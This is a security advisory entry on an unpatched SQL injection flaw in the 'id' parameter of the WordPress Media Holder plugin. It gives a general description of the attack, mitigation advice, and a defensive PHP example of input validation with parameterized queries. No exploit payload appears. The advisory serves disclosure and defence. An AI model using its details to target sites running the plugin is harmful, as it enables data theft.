Vendor: Media Holder
By: boom3rang
CVSS: 7.5 HIGH
SQL Injection
CWE: 89
Product Name: Media Holder
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
WordPress Media Holder (id) SQL injection vulnerability!
A SQL injection vulnerability exists in WordPress Media Holder (id) which allows an attacker to execute arbitrary SQL commands on the underlying database. This is due to the application failing to properly sanitize user-supplied input before using it in an SQL query. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request containing SQL commands to the vulnerable application. Successful exploitation could result in the execution of arbitrary SQL commands on the underlying database, allowing an attacker to access or modify sensitive data.
Mitigation:
Input validation should be used to ensure that user-supplied input is properly sanitized before being used in an SQL query. Additionally, parameterized queries should be used to prevent SQL injection attacks.
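One way to apply both mitigations to an integer `id` lookup, as an added example that is not code from the Media Holder plugin or from this advisory. The `media` table, its columns and `get_media_by_id` are hypothetical, and PDO with an in-memory SQLite database stands in for the WordPress database so the snippet runs on its own.

```php
<?php
// Added example: table, columns and function name are hypothetical,
// not taken from the Media Holder plugin.
declare(strict_types=1);

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE media (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO media (id, title) VALUES (1, 'intro.mp4'), (2, 'teaser.mp4')");

/**
 * Look up one media row by the request's `id` value.
 * Returns the row, or null when the value is not a positive integer
 * or no row matches.
 */
function get_media_by_id(PDO $db, $raw_id): ?array
{
    // 1. Validate: accept only a canonical positive integer.
    $id = filter_var($raw_id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // 2. Parameterize: the value is bound, never concatenated into the SQL text.
    //    In WordPress the equivalent step is
    //    $wpdb->prepare("SELECT ... WHERE id = %d", $id).
    $stmt = $db->prepare('SELECT id, title FROM media WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed inputs: one valid id, then values that are not plain positive integers,
// then a valid integer with no matching row.
foreach (['2', '2 trailing text', '', '-1', '99'] as $input) {
    $row = get_media_by_id($db, $input);
    printf("%-18s => %s\n", var_export($input, true), $row ? $row['title'] : 'rejected / not found');
}
```

Validation and binding are independent layers: the bound parameter keeps the query structure fixed even if the validation rule is later loosened.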